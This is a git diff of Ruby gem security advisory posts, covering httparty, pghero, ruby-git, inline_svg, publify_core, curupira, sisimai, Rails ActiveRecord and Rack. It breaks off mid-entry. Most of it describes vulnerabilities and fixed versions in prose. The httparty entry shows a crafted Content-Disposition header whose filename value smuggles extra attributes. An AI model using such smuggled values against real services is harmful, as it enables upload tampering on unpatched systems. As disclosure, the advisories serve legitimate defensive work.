index 86ca43cb..6a0f71f9 100644
--- a/advisories/_posts/2023-01-03-CVE-2024-22049.md
+++ b/advisories/_posts/2023-01-03-CVE-2024-22049.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2024-22049 (httparty): httparty has multipart/form-data request tampering
-  vulnerability'
-comments: false
-categories:
-- httparty
-advisory:
-  gem: httparty
-  cve: 2024-22049
-  ghsa: 5pq7-52mg-hr42
-  url: https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42
-  title: httparty has multipart/form-data request tampering vulnerability
-  date: 2023-01-03
-  description: |
-    HTTP multipart/form-data request tampering vulnerability in httparty < 0.20.0,
-    due to lack of proper escaping of double quotes within the filename attribute
-    of the Content-Disposition header. If the Content-Disposition header is set to
-    "form-data" and contains the "filename" attribute, and the "filename"
-    attribute contains a double quote followed by additional attributes, then
-    those attributes will be parsed as Content-Disposition attributes and will
-    override the Content-Disposition header's previous attributes.
-
-        Content-Disposition: form-data; name="avatar"; filename="overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt"
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 0.21.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-22049
-    - https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42
-    - https://github.com/jnunemaker/httparty/commit/cdb45a678c43e44570b4e73f84b1abeb5ec22b8e
-    - https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43
-    - https://github.com/advisories/GHSA-5pq7-52mg-hr42
----
+---
+layout: advisory
+title: 'CVE-2024-22049 (httparty): httparty has multipart/form-data request tampering
+  vulnerability'
+comments: false
+categories:
+- httparty
+advisory:
+  gem: httparty
+  cve: 2024-22049
+  ghsa: 5pq7-52mg-hr42
+  url: https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42
+  title: httparty has multipart/form-data request tampering vulnerability
+  date: 2023-01-03
+  description: |
+    HTTP multipart/form-data request tampering vulnerability in httparty < 0.20.0,
+    due to lack of proper escaping of double quotes within the filename attribute
+    of the Content-Disposition header. If the Content-Disposition header is set to
+    "form-data" and contains the "filename" attribute, and the "filename"
+    attribute contains a double quote followed by additional attributes, then
+    those attributes will be parsed as Content-Disposition attributes and will
+    override the Content-Disposition header's previous attributes.
+
+        Content-Disposition: form-data; name="avatar"; filename="overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt"
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 0.21.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-22049
+    - https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42
+    - https://github.com/jnunemaker/httparty/commit/cdb45a678c43e44570b4e73f84b1abeb5ec22b8e
+    - https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43
+    - https://github.com/advisories/GHSA-5pq7-52mg-hr42
+---
diff --git a/advisories/_posts/2023-01-04-CVE-2023-22626.md b/advisories/_posts/2023-01-04-CVE-2023-22626.md
index 948c7a08..f8adc490 100644
--- a/advisories/_posts/2023-01-04-CVE-2023-22626.md
+++ b/advisories/_posts/2023-01-04-CVE-2023-22626.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2023-22626 (pghero): Information Disclosure Through EXPLAIN Feature'
-comments: false
-categories:
-- pghero
-advisory:
-  gem: pghero
-  cve: 2023-22626
-  ghsa: vf99-xw26-86g5
-  url: https://github.com/ankane/pghero/issues/439
-  title: Information Disclosure Through EXPLAIN Feature
-  date: 2023-01-04
-  description: |
-    A malicious PgHero user can use the EXPLAIN functionality to extract data from
-    the database. With certain inputs, a user can get the results of a query to
-    appear in an error message. If the PgHero database user has superuser privileges
-    (not recommended), the user can use file access functions to read files on the
-    database server.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 3.1.0"
----
+---
+layout: advisory
+title: 'CVE-2023-22626 (pghero): Information Disclosure Through EXPLAIN Feature'
+comments: false
+categories:
+- pghero
+advisory:
+  gem: pghero
+  cve: 2023-22626
+  ghsa: vf99-xw26-86g5
+  url: https://github.com/ankane/pghero/issues/439
+  title: Information Disclosure Through EXPLAIN Feature
+  date: 2023-01-04
+  description: |
+    A malicious PgHero user can use the EXPLAIN functionality to extract data from
+    the database. With certain inputs, a user can get the results of a query to
+    appear in an error message. If the PgHero database user has superuser privileges
+    (not recommended), the user can use file access functions to read files on the
+    database server.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 3.1.0"
+---
diff --git a/advisories/_posts/2023-01-05-CVE-2022-46648.md b/advisories/_posts/2023-01-05-CVE-2022-46648.md
index f08f8121..bc58e0eb 100644
--- a/advisories/_posts/2023-01-05-CVE-2022-46648.md
+++ b/advisories/_posts/2023-01-05-CVE-2022-46648.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2022-46648 (git): Potential remote code execution in ruby-git'
-comments: false
-categories:
-- git
-advisory:
-  gem: git
-  cve: 2022-46648
-  ghsa: pfpr-3463-c6jh
-  url: https://github.com/ruby-git/ruby-git/pull/602
-  title: Potential remote code execution in ruby-git
-  date: 2023-01-05
-  description: |
-    The git gem, between versions 1.2.0 and 1.12.0, incorrectly parsed the output
-    of the 'git ls-files' command using eval() to unescape quoted file names.
-    If a file name was added to the git repository contained special characters,
-    such as '\n', then the 'git ls-files' command would print the file name in
-    quotes and escape any special characters.
-    If the 'Git#ls_files' method encountered a quoted file name it would use
-    eval() to unquote and unescape any special characters, leading to potential
-    remote code execution. Version 1.13.0 of the git gem was released which
-    correctly parses any quoted file names.
-  cvss_v3: 5.5
-  unaffected_versions:
-  - "< 1.2.0"
-  patched_versions:
-  - ">= 1.13.0"
-  related:
-    url:
-    - https://github.com/ruby-git/ruby-git/releases/tag/v1.13.0
----
+---
+layout: advisory
+title: 'CVE-2022-46648 (git): Potential remote code execution in ruby-git'
+comments: false
+categories:
+- git
+advisory:
+  gem: git
+  cve: 2022-46648
+  ghsa: pfpr-3463-c6jh
+  url: https://github.com/ruby-git/ruby-git/pull/602
+  title: Potential remote code execution in ruby-git
+  date: 2023-01-05
+  description: |
+    The git gem, between versions 1.2.0 and 1.12.0, incorrectly parsed the output
+    of the 'git ls-files' command using eval() to unescape quoted file names.
+    If a file name was added to the git repository contained special characters,
+    such as '\n', then the 'git ls-files' command would print the file name in
+    quotes and escape any special characters.
+    If the 'Git#ls_files' method encountered a quoted file name it would use
+    eval() to unquote and unescape any special characters, leading to potential
+    remote code execution. Version 1.13.0 of the git gem was released which
+    correctly parses any quoted file names.
+  cvss_v3: 5.5
+  unaffected_versions:
+  - "< 1.2.0"
+  patched_versions:
+  - ">= 1.13.0"
+  related:
+    url:
+    - https://github.com/ruby-git/ruby-git/releases/tag/v1.13.0
+---
diff --git a/advisories/_posts/2023-01-07-CVE-2020-36644.md b/advisories/_posts/2023-01-07-CVE-2020-36644.md
index 52e015d3..edf86ef2 100644
--- a/advisories/_posts/2023-01-07-CVE-2020-36644.md
+++ b/advisories/_posts/2023-01-07-CVE-2020-36644.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2020-36644 (inline_svg): Inline SVG vulnerable to Cross-site Scripting'
-comments: false
-categories:
-- inline_svg
-advisory:
-  gem: inline_svg
-  cve: 2020-36644
-  ghsa: p33q-4h4m-j994
-  url: https://github.com/jamesmartin/inline_svg/pull/117
-  title: Inline SVG vulnerable to Cross-site Scripting
-  date: 2023-01-07
-  description: |
-    A vulnerability has been found in jamesmartin Inline SVG up to 1.7.1
-    and classified as problematic. Affected by this vulnerability is an unknown functionality
-    of the file `lib/inline_svg/action_view/helpers.rb` of the component `URL Parameter
-    Handler`. The manipulation of the argument filename leads to cross site scripting.
-    The attack can be launched remotely. Upgrading to version 1.7.2 is able to address
-    this issue. The name of the patch is f5363b351508486021f99e083c92068cf2943621. It
-    is recommended to upgrade the affected component. The identifier VDB-217597 was
-    assigned to this vulnerability.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.7.2"
-  related:
-    url:
-    - https://github.com/jamesmartin/inline_svg/commit/f5363b351508486021f99e083c92068cf2943621
-    - https://github.com/jamesmartin/inline_svg/releases/tag/v1.7.2
-    - https://vuldb.com/?id.217597
----
+---
+layout: advisory
+title: 'CVE-2020-36644 (inline_svg): Inline SVG vulnerable to Cross-site Scripting'
+comments: false
+categories:
+- inline_svg
+advisory:
+  gem: inline_svg
+  cve: 2020-36644
+  ghsa: p33q-4h4m-j994
+  url: https://github.com/jamesmartin/inline_svg/pull/117
+  title: Inline SVG vulnerable to Cross-site Scripting
+  date: 2023-01-07
+  description: |
+    A vulnerability has been found in jamesmartin Inline SVG up to 1.7.1
+    and classified as problematic. Affected by this vulnerability is an unknown functionality
+    of the file `lib/inline_svg/action_view/helpers.rb` of the component `URL Parameter
+    Handler`. The manipulation of the argument filename leads to cross site scripting.
+    The attack can be launched remotely. Upgrading to version 1.7.2 is able to address
+    this issue. The name of the patch is f5363b351508486021f99e083c92068cf2943621. It
+    is recommended to upgrade the affected component. The identifier VDB-217597 was
+    assigned to this vulnerability.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.7.2"
+  related:
+    url:
+    - https://github.com/jamesmartin/inline_svg/commit/f5363b351508486021f99e083c92068cf2943621
+    - https://github.com/jamesmartin/inline_svg/releases/tag/v1.7.2
+    - https://vuldb.com/?id.217597
+---
diff --git a/advisories/_posts/2023-01-14-CVE-2022-1812.md b/advisories/_posts/2023-01-14-CVE-2022-1812.md
index 9408d7a5..7d8e3ce1 100644
--- a/advisories/_posts/2023-01-14-CVE-2022-1812.md
+++ b/advisories/_posts/2023-01-14-CVE-2022-1812.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2022-1812 (publify_core): Integer overflow in publify_core'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2022-1812
-  ghsa: rc42-jghf-vr8f
-  url: https://github.com/publify/publify/commit/29a5837c29620e33857d7a5afce01384e3f8e41a
-  title: Integer overflow in publify_core
-  date: 2023-01-14
-  description: |
-    Integer Overflow or Wraparound in GitHub repository publify/publify prior
-    to 9.2.10 due to an unlimited length user name field.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 9.2.10"
-  related:
-    url:
-    - https://huntr.dev/bounties/17d86a50-265c-4ec8-9592-0bd909ddc8f3
----
+---
+layout: advisory
+title: 'CVE-2022-1812 (publify_core): Integer overflow in publify_core'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2022-1812
+  ghsa: rc42-jghf-vr8f
+  url: https://github.com/publify/publify/commit/29a5837c29620e33857d7a5afce01384e3f8e41a
+  title: Integer overflow in publify_core
+  date: 2023-01-14
+  description: |
+    Integer Overflow or Wraparound in GitHub repository publify/publify prior
+    to 9.2.10 due to an unlimited length user name field.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 9.2.10"
+  related:
+    url:
+    - https://huntr.dev/bounties/17d86a50-265c-4ec8-9592-0bd909ddc8f3
+---
diff --git a/advisories/_posts/2023-01-14-CVE-2022-2815.md b/advisories/_posts/2023-01-14-CVE-2022-2815.md
index 8773a718..f6822857 100644
--- a/advisories/_posts/2023-01-14-CVE-2022-2815.md
+++ b/advisories/_posts/2023-01-14-CVE-2022-2815.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2022-2815 (publify_core): Publify Core does not strip metadata from images'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2022-2815
-  ghsa: 79wq-g4v9-gfj4
-  url: https://github.com/publify/publify/commit/af69097d349f4c00f244c51cd3c3e937fd3387cd
-  title: Publify Core does not strip metadata from images
-  date: 2023-01-14
-  description: |
-    Insecure Storage of Sensitive Information in GitHub repository publify/publify
-    prior to 9.2.10.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 9.2.10"
-  related:
-    url:
-    - https://huntr.dev/bounties/22fdcc39-8c1a-4e4c-8eae-be3fd764f8b4
-    - https://github.com/publify/publify_core/commit/33f897c12b6efdcdfd8cf9df924deba0f878b71e
----
+---
+layout: advisory
+title: 'CVE-2022-2815 (publify_core): Publify Core does not strip metadata from images'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2022-2815
+  ghsa: 79wq-g4v9-gfj4
+  url: https://github.com/publify/publify/commit/af69097d349f4c00f244c51cd3c3e937fd3387cd
+  title: Publify Core does not strip metadata from images
+  date: 2023-01-14
+  description: |
+    Insecure Storage of Sensitive Information in GitHub repository publify/publify
+    prior to 9.2.10.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 9.2.10"
+  related:
+    url:
+    - https://huntr.dev/bounties/22fdcc39-8c1a-4e4c-8eae-be3fd764f8b4
+    - https://github.com/publify/publify_core/commit/33f897c12b6efdcdfd8cf9df924deba0f878b71e
+---
diff --git a/advisories/_posts/2023-01-14-CVE-2023-0299.md b/advisories/_posts/2023-01-14-CVE-2023-0299.md
index 1c468b3f..ee0ec8f6 100644
--- a/advisories/_posts/2023-01-14-CVE-2023-0299.md
+++ b/advisories/_posts/2023-01-14-CVE-2023-0299.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2023-0299 (publify_core): Publify Improper Input Validation vulnerability'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2023-0299
-  ghsa: q3rm-f527-ghxj
-  url: https://github.com/publify/publify/commit/ca46da283572b4f8c0b5aa245008756c8a5fd1b1
-  title: Publify Improper Input Validation vulnerability
-  date: 2023-01-14
-  description: |
-    Improper Input Validation in GitHub repository publify/publify prior
-    to 9.2.10.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 9.2.10"
-  related:
-    url:
-    - https://huntr.dev/bounties/0049774b-1857-46dc-a834-f1fb15138c53
-    - https://github.com/publify/publify_core/commit/34f6e9c98e0e3b3f9896f9676b3d6442220e2b4e
----
+---
+layout: advisory
+title: 'CVE-2023-0299 (publify_core): Publify Improper Input Validation vulnerability'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2023-0299
+  ghsa: q3rm-f527-ghxj
+  url: https://github.com/publify/publify/commit/ca46da283572b4f8c0b5aa245008756c8a5fd1b1
+  title: Publify Improper Input Validation vulnerability
+  date: 2023-01-14
+  description: |
+    Improper Input Validation in GitHub repository publify/publify prior
+    to 9.2.10.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 9.2.10"
+  related:
+    url:
+    - https://huntr.dev/bounties/0049774b-1857-46dc-a834-f1fb15138c53
+    - https://github.com/publify/publify_core/commit/34f6e9c98e0e3b3f9896f9676b3d6442220e2b4e
+---
diff --git a/advisories/_posts/2023-01-16-CVE-2015-10053.md b/advisories/_posts/2023-01-16-CVE-2015-10053.md
index 7dd6f446..43b06230 100644
--- a/advisories/_posts/2023-01-16-CVE-2015-10053.md
+++ b/advisories/_posts/2023-01-16-CVE-2015-10053.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2015-10053 (curupira): curupira is vulnerable to SQL injection'
-comments: false
-categories:
-- curupira
-advisory:
-  gem: curupira
-  cve: 2015-10053
-  ghsa: 85gf-wr67-f83w
-  url: https://github.com/prodigasistemas/curupira/commit/93a9a77896bb66c949acb8e64bceafc74bc8c271
-  title: curupira is vulnerable to SQL injection
-  date: 2023-01-16
-  description: |
-    A vulnerability classified as critical has been found in prodigasistemas
-    curupira up to 0.1.3. Affected is an unknown function of the file
-    app/controllers/curupira/passwords_controller.rb.
-    The manipulation leads to sql injection. Upgrading to version 0.1.4 is able
-    to address this issue. The name of the patch is
-    93a9a77896bb66c949acb8e64bceafc74bc8c271. It is recommended to upgrade the
-    affected component. VDB-218394 is the identifier assigned to this
-    vulnerability.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.1.4"
-  related:
-    url:
-    - https://github.com/prodigasistemas/curupira/releases/tag/v0.1.4
-    - https://vuldb.com/?id.218394
----
+---
+layout: advisory
+title: 'CVE-2015-10053 (curupira): curupira is vulnerable to SQL injection'
+comments: false
+categories:
+- curupira
+advisory:
+  gem: curupira
+  cve: 2015-10053
+  ghsa: 85gf-wr67-f83w
+  url: https://github.com/prodigasistemas/curupira/commit/93a9a77896bb66c949acb8e64bceafc74bc8c271
+  title: curupira is vulnerable to SQL injection
+  date: 2023-01-16
+  description: |
+    A vulnerability classified as critical has been found in prodigasistemas
+    curupira up to 0.1.3. Affected is an unknown function of the file
+    app/controllers/curupira/passwords_controller.rb.
+    The manipulation leads to sql injection. Upgrading to version 0.1.4 is able
+    to address this issue. The name of the patch is
+    93a9a77896bb66c949acb8e64bceafc74bc8c271. It is recommended to upgrade the
+    affected component. VDB-218394 is the identifier assigned to this
+    vulnerability.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.1.4"
+  related:
+    url:
+    - https://github.com/prodigasistemas/curupira/releases/tag/v0.1.4
+    - https://vuldb.com/?id.218394
+---
diff --git a/advisories/_posts/2023-01-17-CVE-2022-47318.md b/advisories/_posts/2023-01-17-CVE-2022-47318.md
index 99f53160..af6aef09 100644
--- a/advisories/_posts/2023-01-17-CVE-2022-47318.md
+++ b/advisories/_posts/2023-01-17-CVE-2022-47318.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2022-47318 (git): Code injection in ruby git'
-comments: false
-categories:
-- git
-advisory:
-  gem: git
-  cve: 2022-47318
-  ghsa: pphf-gfrm-v32r
-  url: https://github.com/ruby-git/ruby-git/pull/602
-  title: Code injection in ruby git
-  date: 2023-01-17
-  description: |
-    ruby-git versions prior to v1.13.0 allows a remote authenticated attacker
-    to execute an arbitrary ruby code by having a user to load a repository containing
-    a specially crafted filename to the product. This vulnerability is different from
-    CVE-2022-46648.
-  cvss_v3: 8.0
-  patched_versions:
-  - ">= 1.13.0"
-  related:
-    url:
-    - https://jvn.jp/en/jp/JVN16765254/index.html
----
+---
+layout: advisory
+title: 'CVE-2022-47318 (git): Code injection in ruby git'
+comments: false
+categories:
+- git
+advisory:
+  gem: git
+  cve: 2022-47318
+  ghsa: pphf-gfrm-v32r
+  url: https://github.com/ruby-git/ruby-git/pull/602
+  title: Code injection in ruby git
+  date: 2023-01-17
+  description: |
+    ruby-git versions prior to v1.13.0 allows a remote authenticated attacker
+    to execute an arbitrary ruby code by having a user to load a repository containing
+    a specially crafted filename to the product. This vulnerability is different from
+    CVE-2022-46648.
+  cvss_v3: 8.0
+  patched_versions:
+  - ">= 1.13.0"
+  related:
+    url:
+    - https://jvn.jp/en/jp/JVN16765254/index.html
+---
diff --git a/advisories/_posts/2023-01-17-CVE-2022-4891.md b/advisories/_posts/2023-01-17-CVE-2022-4891.md
index 1f5ee15c..ff423c77 100644
--- a/advisories/_posts/2023-01-17-CVE-2022-4891.md
+++ b/advisories/_posts/2023-01-17-CVE-2022-4891.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2022-4891 (sisimai): Sisimai Inefficient Regular Expression Complexity
-  vulnerability'
-comments: false
-categories:
-- sisimai
-advisory:
-  gem: sisimai
-  cve: 2022-4891
-  ghsa: vm74-j4wq-82xj
-  url: https://github.com/sisimai/rb-sisimai/pull/244
-  title: Sisimai Inefficient Regular Expression Complexity vulnerability
-  date: 2023-01-17
-  description: |
-    A vulnerability has been found in Sisimai up to 4.25.14p11 and classified
-    as problematic. This vulnerability affects the function `to_plain` of the file `lib/sisimai/string.rb`.
-    The manipulation leads to inefficient regular expression complexity. The exploit
-    has been disclosed to the public and may be used. Upgrading to version 4.25.14p12
-    is able to address this issue. The name of the patch is 51fe2e6521c9c02b421b383943dc9e4bbbe65d4e.
-    It is recommended to upgrade the affected component.
-  cvss_v3: 4.3
-  patched_versions:
-  - ">= 4.25.14p12"
-  related:
-    url:
-    - https://github.com/sisimai/rb-sisimai/commit/51fe2e6521c9c02b421b383943dc9e4bbbe65d4e
-    - https://gist.githubusercontent.com/gmcabrita/e5dc0332473fc2e3a7a407434c8d21c7/raw/00b12035e5e1b685469f143b94301a50306376ba/example.html
-    - https://github.com/sisimai/rb-sisimai/releases/tag/v4.25.14p12
-    - https://vuldb.com/?id.218452
----
+---
+layout: advisory
+title: 'CVE-2022-4891 (sisimai): Sisimai Inefficient Regular Expression Complexity
+  vulnerability'
+comments: false
+categories:
+- sisimai
+advisory:
+  gem: sisimai
+  cve: 2022-4891
+  ghsa: vm74-j4wq-82xj
+  url: https://github.com/sisimai/rb-sisimai/pull/244
+  title: Sisimai Inefficient Regular Expression Complexity vulnerability
+  date: 2023-01-17
+  description: |
+    A vulnerability has been found in Sisimai up to 4.25.14p11 and classified
+    as problematic. This vulnerability affects the function `to_plain` of the file `lib/sisimai/string.rb`.
+    The manipulation leads to inefficient regular expression complexity. The exploit
+    has been disclosed to the public and may be used. Upgrading to version 4.25.14p12
+    is able to address this issue. The name of the patch is 51fe2e6521c9c02b421b383943dc9e4bbbe65d4e.
+    It is recommended to upgrade the affected component.
+  cvss_v3: 4.3
+  patched_versions:
+  - ">= 4.25.14p12"
+  related:
+    url:
+    - https://github.com/sisimai/rb-sisimai/commit/51fe2e6521c9c02b421b383943dc9e4bbbe65d4e
+    - https://gist.githubusercontent.com/gmcabrita/e5dc0332473fc2e3a7a407434c8d21c7/raw/00b12035e5e1b685469f143b94301a50306376ba/example.html
+    - https://github.com/sisimai/rb-sisimai/releases/tag/v4.25.14p12
+    - https://vuldb.com/?id.218452
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2022-44566.md b/advisories/_posts/2023-01-18-CVE-2022-44566.md
index 338592c6..f6245afa 100644
--- a/advisories/_posts/2023-01-18-CVE-2022-44566.md
+++ b/advisories/_posts/2023-01-18-CVE-2022-44566.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2022-44566 (activerecord): Denial of Service Vulnerability in ActiveRecord’s
-  PostgreSQL adapter'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2022-44566
-  ghsa: 579w-22j4-4749
-  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
-  title: Denial of Service Vulnerability in ActiveRecord’s PostgreSQL adapter
-  date: 2023-01-18
-  description: |
-    There is a potential denial of service vulnerability present in
-    ActiveRecord’s PostgreSQL adapter.
-
-    This has been assigned the CVE identifier CVE-2022-44566.
-
-    Versions Affected: All.
-    Not affected: None.
-    Fixed Versions: 6.1.7.1, 7.0.4.1
-
-    # Impact
-
-    In ActiveRecord <7.0.4.1 and <6.1.7.1, when a value outside the range for a
-    64bit signed integer is provided to the PostgreSQL connection adapter, it
-    will treat the target column type as numeric. Comparing integer values
-    against numeric values can result in a slow sequential scan resulting in
-    potential Denial of Service.
-
-    # Workarounds
-
-    Ensure that user supplied input which is provided to ActiveRecord clauses do
-    not contain integers wider than a signed 64bit representation or floats.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 5.2.8"
-  - "~> 6.1.7, >= 6.1.7.1"
-  - ">= 7.0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2022-44566 (activerecord): Denial of Service Vulnerability in ActiveRecord’s
+  PostgreSQL adapter'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2022-44566
+  ghsa: 579w-22j4-4749
+  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
+  title: Denial of Service Vulnerability in ActiveRecord’s PostgreSQL adapter
+  date: 2023-01-18
+  description: |
+    There is a potential denial of service vulnerability present in
+    ActiveRecord’s PostgreSQL adapter.
+
+    This has been assigned the CVE identifier CVE-2022-44566.
+
+    Versions Affected: All.
+    Not affected: None.
+    Fixed Versions: 6.1.7.1, 7.0.4.1
+
+    # Impact
+
+    In ActiveRecord <7.0.4.1 and <6.1.7.1, when a value outside the range for a
+    64bit signed integer is provided to the PostgreSQL connection adapter, it
+    will treat the target column type as numeric. Comparing integer values
+    against numeric values can result in a slow sequential scan resulting in
+    potential Denial of Service.
+
+    # Workarounds
+
+    Ensure that user supplied input which is provided to ActiveRecord clauses do
+    not contain integers wider than a signed 64bit representation or floats.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 5.2.8"
+  - "~> 6.1.7, >= 6.1.7.1"
+  - ">= 7.0.4.1"
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2022-44570.md b/advisories/_posts/2023-01-18-CVE-2022-44570.md
index 4469b901..ca3caf18 100644
--- a/advisories/_posts/2023-01-18-CVE-2022-44570.md
+++ b/advisories/_posts/2023-01-18-CVE-2022-44570.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2022-44570 (rack): Denial of service via header parsing in Rack'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2022-44570
-  ghsa: 65f5-mfpf-vfhj
-  url: https://github.com/rack/rack/releases/tag/v3.0.4.1
-  title: Denial of service via header parsing in Rack
-  date: 2023-01-18
-  description: |
-    There is a possible denial of service vulnerability in the Range header
-    parsing component of Rack. This vulnerability has been assigned the CVE
-    identifier CVE-2022-44570.
-
-    Versions Affected: >= 1.5.0
-    Not affected: None.
-    Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.2, 3.0.4.1
-
-    # Impact
-
-    Carefully crafted input can cause the Range header parsing component in Rack
-    to take an unexpected amount of time, possibly resulting in a denial of
-    service attack vector. Any applications that deal with Range requests (such
-    as streaming applications, or applications that serve files) may be impacted.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.0.9, >= 2.0.9.2"
-  - "~> 2.1.4, >= 2.1.4.2"
-  - "~> 2.2.6, >= 2.2.6.2"
-  - ">= 3.0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2022-44570 (rack): Denial of service via header parsing in Rack'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2022-44570
+  ghsa: 65f5-mfpf-vfhj
+  url: https://github.com/rack/rack/releases/tag/v3.0.4.1
+  title: Denial of service via header parsing in Rack
+  date: 2023-01-18
+  description: |
+    There is a possible denial of service vulnerability in the Range header
+    parsing component of Rack. This vulnerability has been assigned the CVE
+    identifier CVE-2022-44570.
+
+    Versions Affected: >= 1.5.0
+    Not affected: None.
+    Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.2, 3.0.4.1
+
+    # Impact
+
+    Carefully crafted input can cause the Range header parsing component in Rack
+    to take an unexpected amount of time, possibly resulting in a denial of
+    service attack vector. Any applications that deal with Range requests (such
+    as streaming applications, or applications that serve files) may be impacted.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.0.9, >= 2.0.9.2"
+  - "~> 2.1.4, >= 2.1.4.2"
+  - "~> 2.2.6, >= 2.2.6.2"
+  - ">= 3.0.4.1"
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2022-44571.md b/advisories/_posts/2023-01-18-CVE-2022-44571.md
index 4c65160c..c490b522 100644
--- a/advisories/_posts/2023-01-18-CVE-2022-44571.md
+++ b/advisories/_posts/2023-01-18-CVE-2022-44571.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2022-44571 (rack): Denial of Service Vulnerability in Rack Content-Disposition
-  parsing'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2022-44571
-  ghsa: 93pm-5p5f-3ghx
-  url: https://github.com/rack/rack/releases/tag/v3.0.4.1
-  title: Denial of Service Vulnerability in Rack Content-Disposition parsing
-  date: 2023-01-18
-  description: |
-    There is a denial of service vulnerability in the Content-Disposition parsing
-    component of Rack. This vulnerability has been assigned the CVE identifier
-    CVE-2022-44571.
-
-    Versions Affected: >= 2.0.0
-    Not affected: None.
-    Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.1, 3.0.4.1
-
-    # Impact
-
-    Carefully crafted input can cause Content-Disposition header parsing in Rack
-    to take an unexpected amount of time, possibly resulting in a denial of
-    service attack vector. This header is used typically used in multipart
-    parsing. Any applications that parse multipart posts using Rack (virtually
-    all Rails applications) are impacted.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  patched_versions:
-  - "~> 2.0.9, >= 2.0.9.2"
-  - "~> 2.1.4, >= 2.1.4.2"
-  - "~> 2.2.6, >= 2.2.6.1"
-  - ">= 3.0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2022-44571 (rack): Denial of Service Vulnerability in Rack Content-Disposition
+  parsing'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2022-44571
+  ghsa: 93pm-5p5f-3ghx
+  url: https://github.com/rack/rack/releases/tag/v3.0.4.1
+  title: Denial of Service Vulnerability in Rack Content-Disposition parsing
+  date: 2023-01-18
+  description: |
+    There is a denial of service vulnerability in the Content-Disposition parsing
+    component of Rack. This vulnerability has been assigned the CVE identifier
+    CVE-2022-44571.
+
+    Versions Affected: >= 2.0.0
+    Not affected: None.
+    Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.1, 3.0.4.1
+
+    # Impact
+
+    Carefully crafted input can cause Content-Disposition header parsing in Rack
+    to take an unexpected amount of time, possibly resulting in a denial of
+    service attack vector. This header is used typically used in multipart
+    parsing. Any applications that parse multipart posts using Rack (virtually
+    all Rails applications) are impacted.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  patched_versions:
+  - "~> 2.0.9, >= 2.0.9.2"
+  - "~> 2.1.4, >= 2.1.4.2"
